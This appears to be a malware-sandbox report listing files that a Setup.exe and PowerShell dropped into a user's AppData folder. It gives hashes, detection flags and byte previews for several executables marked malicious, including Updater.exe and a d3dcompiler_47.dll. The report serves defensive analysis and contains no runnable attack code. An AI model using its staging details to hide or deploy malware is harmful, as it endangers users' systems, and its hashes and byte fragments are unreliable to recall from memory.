                                                                                                                                                                                                        Entropy (8bit):7.9262695020755505
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:393216:W1pU8xeUOhMFCBURDP4RSLkcswLqLibwonZ14tb:Wr7rCBURqcTXconZ1Ab
                                                                                                                                                                                                        MD5:77B8F54C99903633175BF2EE83B93089
                                                                                                                                                                                                        SHA1:F8A7C2D280464EA887F95295670D1A3C78146519
                                                                                                                                                                                                        SHA-256:09F7868EB0D7629399F54934AE930314358845C9929D973B05F6C1CCA7C67A9E
                                                                                                                                                                                                        SHA-512:54D618060571517317F5A6020D79A0E693D499AC865C2A031B5F7AFCCE0EBF75F3610C42F807FEA0FC0B7852F0B119EABE80E317EC7CB181B90B90C202A09BBB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..^...........!.................E5.......................................w......a9...@..........................B..|....K.x....pw..............j..` ....w.....................................`aw.@...............,............................text...z........................... ..`.rdata...D..........................@..@.data...pC....!.....................@..._COF0.....v..@(..................... ..`_COF1...D...........................@..._COF2....R.......T.................. ..`.rsrc........pw......Z..............@..@.reloc........w......b..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Driver\vstji

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9926
                                                                                                                                                                                                        Entropy (8bit):6.601683018009094
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:bcCThv4kMUxkMSwJZ8JewGJ6PlKeVsXmWl97ZHaaRbdn2OYvFDE84BRP:vThvYMSwJZ+GJ6PMtWWX16ab29Kb
                                                                                                                                                                                                        MD5:0780B1687F4B818A6CCA3CAF57B0D062
                                                                                                                                                                                                        SHA1:49B0E39A452F956F640F185CF396D31E8E8E8A39
                                                                                                                                                                                                        SHA-256:9E7AEA9FBA017E367B8FD3B188F6AFEF0197F89036FA35420729F19048C6FF2D
                                                                                                                                                                                                        SHA-512:8B002C586B73D4AF5A5DAAE512C2B096C4A061BC69AD3750C930D6429FA75C947BD7305A25A9378BEE236C1028914E91B9111A7D735B9D029E2FE7063562CB00
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..V..`........LyQQ.c..m]....PW.pZRh.`.a..Nv.Y.i.mx.x..R.Vja.y.d.L.u........N...k.Sh.U..V.K.tQ.klyO.jlu..C.a..hgE.od....g\v..PCHu.l..I.R..SB...\xu..A.\B.li.v..Xe.QOxLP....NElW....Eb.BD...Hs..v..TNyK...g..]D^b.v.vDMU.^m..Z..s.U_t.....r.e...l.Z....y...itf.Bg....g....C]qcp_.o..sw.H....j]QXTsjPiL.[w.n^...SrQf.X.d...k^YllAAL.r.nQ...JJbn.N...R..B.Sa..CV.mp.`P....rv.....T..O..kQ...B...sk..H.....i.m.I..aI......w.bJA...Pt...B.g._..ov....v.p.liS..hGIG.gBNZ.xf...ET.f...S.Q.ZS...q..oXn..Ds.q.C..y.wF^A..k...y.....SjV...py._riT..mx.M.g.qe....J...mNuOtS......t.NNeX.u...qQ.g.[kEP..jm.^P..l..G...b.Zr\Dg.MfV..kJ..k.`kyQnw.o.LE............yJ..me.r......Tx..y...U...R...F..r...]ty..BV.......dXO..RA.V...K..S.TK..YIhQmqu\...GGG..X...YEMwx[..I.wg.NjA...kLox..MYg..q..U^M..rr...Y...h.._..Uu.b....K.i..W..]..N...e..e.LB...l..VDW[..E....]g.[q.IwW.`b...F...WVO.Y..xt..`...sd]B..L....s.RLk....r.T._..wB.q.....PG..Bc..s...u.Cf..^b..yD.[.xcc^...NQq..b.....t...Lut.P...j...m..`ms..r.....C...Dm....N..n._psKuIavuTOOmHtJkR..w

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Driver\ylqv

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):986746
                                                                                                                                                                                                        Entropy (8bit):7.867918664785953
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:bfMR7mqnsKaQ+RFiZhbvisb4E5aJZNFCPxmO8al:YR7mqn+RFATiF9NFCpms
                                                                                                                                                                                                        MD5:CF297F837262C0FBD5AD028C39A53B62
                                                                                                                                                                                                        SHA1:B6B54C0476C1F4168B829A9A475888BAF3B14012
                                                                                                                                                                                                        SHA-256:4CBDB194C720BC44A5B234FAAA03925EE9566DE6D814D9124DFA6767B41E03CB
                                                                                                                                                                                                        SHA-512:283D2B15A5F317910A5EB5BB74604894E3F36DD907254D98F26C2130A770B552DE6631AFD2D820DE0A9EA069643F19BC86884D719C0F8DFA4B1394FF7880D10B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.R..FV...U_.fQpjF.pSZ..\n....dXO......UZU..L.U.....K..p.....E.t.S...er..L..v.XE..j.ie.TaQS.D.._.yw...o.Q.w.m...SU......gd.\XyQ.....p...R..ux.Ch.E.U.hT.gOi.JqBM..t...qLqe..`......K..HG.[].m....R.w..wFe.....^iMQ.Mbmi......o.C[...y.w..G..HM..UO..y.D..d.Lro.sW......J.Z[..yTY.........y...f.w.iYulDcV.xIm.l.gcQ.F.o.._`R.j.WM....^Rjh.......U.yj.g..K..L.G..]S..]NPV...Oo.L.V......k..gA..p..S..Q.P..H`V.e.T...DwR.....s..K.Yp._f...s.RE..l.n.....PO.sNt.IM.i.....argDt.D.._.......w.B..w.wj...O.....d.C..r.]fp..j..pB......`g......UH.n.FIEM.x\f.Dcyx...l..kX.TWRP..ne.tA..WTM.NFI..OP.i..Kp.W...S...gT.a...RJ..Sar.f....M.D[...YH...`n.p.y.Im.c..TT..d..hiO.Bi.a^.n...KUP.oeJW.JoQspIJET`..`..wS..^.MQ.R.Tpou.d...^P..[oB...B.V.D..tBv....uYDpw.C.S..QN.EX...F.....s......[.e...Uq..h.`.h....T....[.....c.DXj_S..t]...WU..E.Bl.i.l..V....P[..J..^.L.Rx.A..i`..H.]...[.jou......P.eG..VDKh.LLN....Q.g....Yv.iN.fx.ITl.aR..Om..GDm........Rn.jD.qYU....by.XtMErXi.......W.krpNK....\..T..Z....pP.T...sCx..g.t.hvrLZm.F........L...vmN.

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\NAudio.xml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1054613
                                                                                                                                                                                                        Entropy (8bit):4.601238684297783
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:HCH/qJhYLq2SudOFFEpSQjV2SFq3Pxl2ZRN6hhQvb/0nPubFnkFrAt:8FLZGFEnJt6hhQ0PykFY
                                                                                                                                                                                                        MD5:224D05879C6F2B9708EDBB7CF244E76E
                                                                                                                                                                                                        SHA1:5DB1157DDFEFFC4C30650B21F014530470EFE729
                                                                                                                                                                                                        SHA-256:8E58FFD1BA32AB7EAE118F2861ED1449F49A3CD0C459DF2AC26A1FF1BF4D7245
                                                                                                                                                                                                        SHA-512:D3CF29A37D3B5E1FAA7B8153FB2C21DB9A65868530C51D8E589CDD2E010674CD93610DDC10309D15DF07B6E9E6D6D892C8DB0E16E67638BF72BEAD9FC83E4AB9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>NAudio</name>.. </assembly>.. <members>.. <member name="T:NAudio.Codecs.ALawDecoder">.. <summary>.. a-law decoder.. based on code from:.. http://hazelware.luggle.com/tutorials/mulawcompression.html.. </summary>.. </member>.. <member name="F:NAudio.Codecs.ALawDecoder.ALawDecompressTable">.. <summary>.. only 512 bytes required, so just use a lookup.. </summary>.. </member>.. <member name="M:NAudio.Codecs.ALawDecoder.ALawToLinearSample(System.Byte)">.. <summary>.. Converts an a-law encoded byte to a 16 bit linear sample.. </summary>.. <param name="aLaw">a-law encoded byte</param>.. <returns>Linear sample</returns>.. </member>.. <member name="T:NAudio.Codecs.ALawEncoder">.. <summary>.. A-law encoder.. </

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.ex

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):424552
                                                                                                                                                                                                        Entropy (8bit):6.000236226718345
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:bebeJQsqiaJnFdHfQoB9bls1YxRz5QZ1y+ymaQfA30KQBhYJXv4M4Mz07ROZH1pH:jh+nf4+tG/vyohq4M4M4gl7T
                                                                                                                                                                                                        MD5:A341D9BFAAE6A784CB9E2EA49C183FB4
                                                                                                                                                                                                        SHA1:D061C12DFFA6A725F649DAE49C99F157E93BB175
                                                                                                                                                                                                        SHA-256:52416BB8275988AA5145BE6359B6C6A92E3C20817544682C2C1978B50FF2052C
                                                                                                                                                                                                        SHA-512:9DFF4BA2ABF889C9F9E71DA1F91ABDDE1742A542B53E8C289E011113E1BCB86D4B1AAF5E7AADF97AA5ED36AB50227295E27CE700D30524F7198FD8F3928C36A2
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.. yx.syx.syx.sp.#sux.s...r{x.sl..rex.sl..rsx.sl..rzx.sl..r.x.syx.szx.syx.s.x.sO..r.x.sO.Osxx.syx'sxx.sO..rxx.sRichyx.s........PE..d....\.e.........."....%............4..........@...................................../....`..........................................................`...........F...R..h(...p..8"..PT..T............................S..@............................................text............................... ..`.rdata..............................@..@.data....a.......\..................@....pdata...F.......H..................@..@.rsrc........`.......&..............@..@.reloc..8"...p...$..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.exe.config

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1106
                                                                                                                                                                                                        Entropy (8bit):5.038231865445437
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dV8F7H3p2/+XBPpZp2/+XBPqp2/+XBw1irkV:cVg7C+XBR4+XBn+XBvrE
                                                                                                                                                                                                        MD5:75E66AB540561A0C7D4160271F518243
                                                                                                                                                                                                        SHA1:AD6501E407D216744B6C3DE76D7664D9581EBAD2
                                                                                                                                                                                                        SHA-256:091AFFF3BB63024B5A7B14EA30306B6753858FD1A33FC8C98E3B5E65FE92FBE7
                                                                                                                                                                                                        SHA-512:FCB55C0FDBB984B06AFF2FAFCAEA2596C175AA5A07D2F1A401305D3441338AA266A53D2DE7A7577684884A2E12CE3EE430B2E1D0210684A7EEFAF9EAA0DE115F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.... <appSettings>.. <add key="DownloadLocation" value=""/>.. </appSettings>.... <runtime>.... <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.... <dependentAssembly>.... <assemblyIdentity name="System.Runtime" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Threading.Tasks" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Net.Http" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... </assemblyBinding>.... </runtime>

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4917656
                                                                                                                                                                                                        Entropy (8bit):6.3987875878837785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:+CZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRNZ:tG2QCwmHjnog/pzHAo/Ay
                                                                                                                                                                                                        MD5:B37CC24FCFDCCA9DEAD17A498E66DB9C
                                                                                                                                                                                                        SHA1:C959AB27CE476DCB0C7312C30C613FE3307BB877
                                                                                                                                                                                                        SHA-256:9F5B1AD41183BA50896EB09BE917B1382980224E212A97080D33C0BF3DEE40DD
                                                                                                                                                                                                        SHA-512:E62E1B985939688AA2EB920F5CFA50377934A8256D7AAA8A1DEF705DE1D47E5CD15515D043622553BBE512469F5C2ED05A7BDEDD4F5D17E99109274F9BFFE95C
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K.......K...`A........................................`%G.x....(G.P.....J.@.....H.......J..)....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\devtools_resources.pak

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6175880
                                                                                                                                                                                                        Entropy (8bit):5.4706772583563845
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:sLFPZAKkA/koZdvvVqdkTZdvvVqwkF/yWzmJUTvU8ZaTG2os1y3JkkaXSqDJMuXR:WLwW
                                                                                                                                                                                                        MD5:731A70D555B49A74607EFA43D407948F
                                                                                                                                                                                                        SHA1:01B9D0CF34EAB6D171A819C0A6A694B8B499702E
                                                                                                                                                                                                        SHA-256:94B15729530FCF90D11156D38FFD0152ACE21182EE44E63C51DC5E2AF25345D2
                                                                                                                                                                                                        SHA-512:4D8EB837BA3FF475F42D72DF0375CA4CC0CA18B4E3702FF39E910D67686AFB81234C457C61BDD36C8927FF73695BB19017423CDA2787242273E0BAA398DDABB0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........~....p.....p.....p.3...p.6...p.p...p./...p.3...p.7...pd....p8....pu....pM....p.....p:]$..pu_$..p.0%..p.2%..pQ.%..pR.&..p..+..psi+..pV.+..p..+..p.a0..p.A1..p;.3..p..3..p.?4..p..5..p..5..p..5..p..:..p4W:..p~w:..pD.:..py.:..p0.;..p+.;..pe.=..pe.=..p..>..p..>..p..B..pN.C..pi~E..p..E..p..H..q.PI..q3.L..q.OL..q..L..q,,M..qP?M..q%SN..q..R..qo.U..q.wV..q.xZ..q..Z..q<0[..q..\..q.n\..q.v\..q~w\..q.~\..q.~\..q..\..q..\..q..\..q.\..qy.\..q..\..q.\..qm.\..qs.\..q.\..qp.\..ql.\..q.\. ql.\.!q..\."q..\.#q..].$q=.].%q..].&q..].'q..].(q..].)q..].*qa"].+q.\].,q.n].-q.]..q.]./q..].0qB.].1q..].2q..].3q.].4q..].5q`.].6qL.].7q.].8qG.].9q..].:q..].;q+.].<q..].=q.].>q\.].?qo.].@q..].Aq..].Bq..].Cq..].Dq>.].Eq..].Fq\.].Gq..].HqB.^.Iq..^.Jq).^.Kq8.^.Lq>.^.Mq..^.Nq..^....<^..p&.W._,...T...Ve .8..P.H...=......D.g.{.:..r.....R.j.`.._....a.J...[U....[.o.A.......Uvx......lM........k...2|.+.....c1BJu[G"..A.p.Z.......I..^x....Q4....2f.6..[..#x...T.}r....oP...(i......pr..mU_.O5.2..4{}.MQG..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ActiveXInstallService.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (403), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5601
                                                                                                                                                                                                        Entropy (8bit):4.777090038504722
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm0fUsPXKn5o3OqALPLFS31U87GUkNAsGNuiYzXmoOX1mTXoWlIGe0FsC:LeD5pmKeC3G8SsuiYR1Pl7e0V4zZpBsV
                                                                                                                                                                                                        MD5:46876B1E6C8BA1FBF3ABC838CCF809B0
                                                                                                                                                                                                        SHA1:45CE70EDD0CA87A5920D43385066087DF134E30F
                                                                                                                                                                                                        SHA-256:F49428CABB6F6671D95EF214133100C268D2AB04DBF0F095DD08B0105ED9D8A7
                                                                                                                                                                                                        SHA-512:702C319B2D181753BE99D99C3DFF9F6C578934067C89A614E9E4B0A5DA6A0FB3545A3BA4986E12E9DA5DE8C6AF56780982D181A8D949A6E573AF725E2505DECA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>ActiveX Installer Service</displayName>.. <description>Installs ActiveX controls from approved installation sites</description>.. <resources>.. <stringTable>.. <string id="AxInstSv">ActiveX Installer Service</string>.. <string id="AxISURLZonePolicies">Establish ActiveX installation policy for sites in Trusted zones</string> .. <string id="AxISURLZonePolicies_explain">This policy setting controls the installation of ActiveX controls for sites in Trusted zone. ....If you enable this policy setting, ActiveX controls are installed according to the settings defined by this policy setting. .. ..If you disable or do not configure t

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\AddRemovePrograms.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (496), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10736
                                                                                                                                                                                                        Entropy (8bit):4.664813059485856
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Eyvs59wT2mCtKNSMRdMi4LBDZDHZEzT+ygx5LDkFdzj9nWyihWhqeGzpbeEKJ28m:ZvyiCDdyTO54zj9na8hqe6pbeEK5jq
                                                                                                                                                                                                        MD5:DFE20A0CA8674D6EAEA280C139E2688A
                                                                                                                                                                                                        SHA1:97027B92D40F5029FF296A9EA3105B775B50C209
                                                                                                                                                                                                        SHA-256:C97CD236F8BE2B235685D3D16632482839208604DB3F550F9524EAFDA33B9CA9
                                                                                                                                                                                                        SHA-512:120C45BD17045B6F3D4A9295E1888D81FFA99ED0F1D146AA2EEC387C1187EEF8C718179771BC0CDBE01A37A487D933F55C92F6F37954F392F007CBFAA2AEC877
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Arp">Add or Remove Programs</string>.. <string id="DefaultCategory">Specify default category for Add New Programs</string>.. <string id="DefaultCategory_Help">Specifies the category of programs that appears when users open the "Add New Programs" page.....If you enable this setting, only the programs in the category you specify are displayed when the "Add New Programs" page opens. Users can use the Category box on the "Add New Programs" page to display programs in other categories.....To use this setting,

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\AppCompat.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10119
                                                                                                                                                                                                        Entropy (8bit):4.722381803392372
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EsMVhCuGKXl6hIAtZUqxw66Utw0Uvk3EUN2X/TDcvEn:J/uX6GAjj6mcvk3EUN2XXcvQ
                                                                                                                                                                                                        MD5:93C28840D18ED15AF63308926F5AAC66
                                                                                                                                                                                                        SHA1:5ED7A8056F1E8A68FEA17C6EF81B695DF8A3EA70
                                                                                                                                                                                                        SHA-256:0AC43A8DF0E8795968C0F9B6ECC6FBF620B761C128545AD689EEC5DFF21F5F1D
                                                                                                                                                                                                        SHA-512:653B9905DC0BBDE62F06EFA1C613F4E4A0823331D31D396DB0226FDB41A9AD4D148C1B5DABFA0CA64A74156F5AD446428F3344FFE75828A7C8225D3F0D214758
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppCompat">Application Compatibility</string>.. <string id="AppCompat_Prevent16BitMach_Help">Specifies whether to prevent the MS-DOS subsystem (ntvdm.exe) from running on this computer. This setting affects the launching of 16-bit applications in the operating system.....You can use this setting to turn off the MS-DOS subsystem, which will reduce resource usage and prevent users from running 16-bit applications. To run any 16-bit application or any application with 16-bit components, ntvdm.exe must be allowed

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\AppXRuntime.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (394), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4462
                                                                                                                                                                                                        Entropy (8bit):4.744620806615911
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:jJpm5IJUVaBfgHt6kNEmB+kClbNpbj03V:Xc3AIHF20F
                                                                                                                                                                                                        MD5:BF19DB2E91EDEFE517515BA23B30103E
                                                                                                                                                                                                        SHA1:324D98B315D7F8E096D8D61505610706D0C73856
                                                                                                                                                                                                        SHA-256:42778994D23CDB74C446E70C30942991E89DF6AACC1225AEBB05464D69DA6DEC
                                                                                                                                                                                                        SHA-512:9C193CD9597F90913643CDD2079E36930E60B6AB539D96BA0D5DA7EA2B5DDE0B78D7451D0A4AC37CBBB8A90C548285FBF640099EDA949665E186586D893ADB14
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>App runtime</displayName>.. <description>App runtime policies</description>.. <resources>.. <stringTable>.. <string id="AppxRuntime">App runtime</string>.. <string id="AppxRuntime_Help">Contains settings to manage the behavior of Windows Store apps.</string>.. <string id="AppxRuntimeBlockFileElevation">Block launching desktop apps associated with a file.</string>.. <string id="AppxRuntimeBlockFileElevationExplanation">This policy setting lets you control whether Windows Store apps can open files using the default desktop app for a file type. Because desktop apps run at a higher integrity level than Windows Store apps

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\AppxPackageManager.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3093
                                                                                                                                                                                                        Entropy (8bit):4.7903363478779735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:c0Jx8gm9JcfSB2W27u0jX9X/f4kvqGbRG4QXzgtWFV:jJpm9Jc62Dv5bRjWFV
                                                                                                                                                                                                        MD5:B182F0B429A84D7E97C3D50EADF154A5
                                                                                                                                                                                                        SHA1:87DDA04EDCFE5E6C22F0224D9EE8375E0920B7F6
                                                                                                                                                                                                        SHA-256:5CD8B222AECBDEAC3DF2DE6B774AF7E02988981136F6E5E9CD3D12735C6A6416
                                                                                                                                                                                                        SHA-512:C42670FA053734C1B909FBB1AE189D4ACF72B290679C1564D78276022BDF0AFD279558C608F00953325E5AEE47EB93DF35C5AFDBB29F698E5C8F808610DB5055
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. displayName and description are not used. Not supported by current Group Policy tools. -->.. <displayName>Appx Package Manager</displayName> .. <description>Appx Package Manager</description>.. <resources>.. <stringTable>.. <string id="AppxDeployment">App Package Deployment</string>.. <string id="AppxDeploymentAllowAllTrustedApps">Allow all trusted apps to install</string>.. <string id="AppxDeploymentAllowAllTrustedAppsExplanation">This policy setting allows you to manage the installation of trusted line-of-business (LOB) Windows Store apps.....If you enable this policy setting, you can install any LOB Windows Store app (which m

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\AttachmentManager.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (564), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9845
                                                                                                                                                                                                        Entropy (8bit):4.7103779388766025
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmiPXXvXd0GkXgueX0dX0LhTW9jS+9FMDPaSPL9DVH60XZgn9ZE60Y2IHm0s:EZHvmQ/WXtyPHPLuV3HmEPdHK
                                                                                                                                                                                                        MD5:156ADEBCA5CD43E0D849F921B26594C3
                                                                                                                                                                                                        SHA1:0DCDA3A3C5CDB824D7FAE9FD2D52638DE6BAC841
                                                                                                                                                                                                        SHA-256:6974AEBDCB65AB63DECD224D3C060F0AFCA11E00C781657EAD44F64073094BF8
                                                                                                                                                                                                        SHA-512:32DC4890719AAEBC7CB5A088EF7C4FD7A86207C36E76C0FA60584E3DF0687C2DF297CBF82750885BCD42542700BD0D14011D57D9CED9FC32E582F70061C68013
                                                                                                                                                                                                        Malicious:false
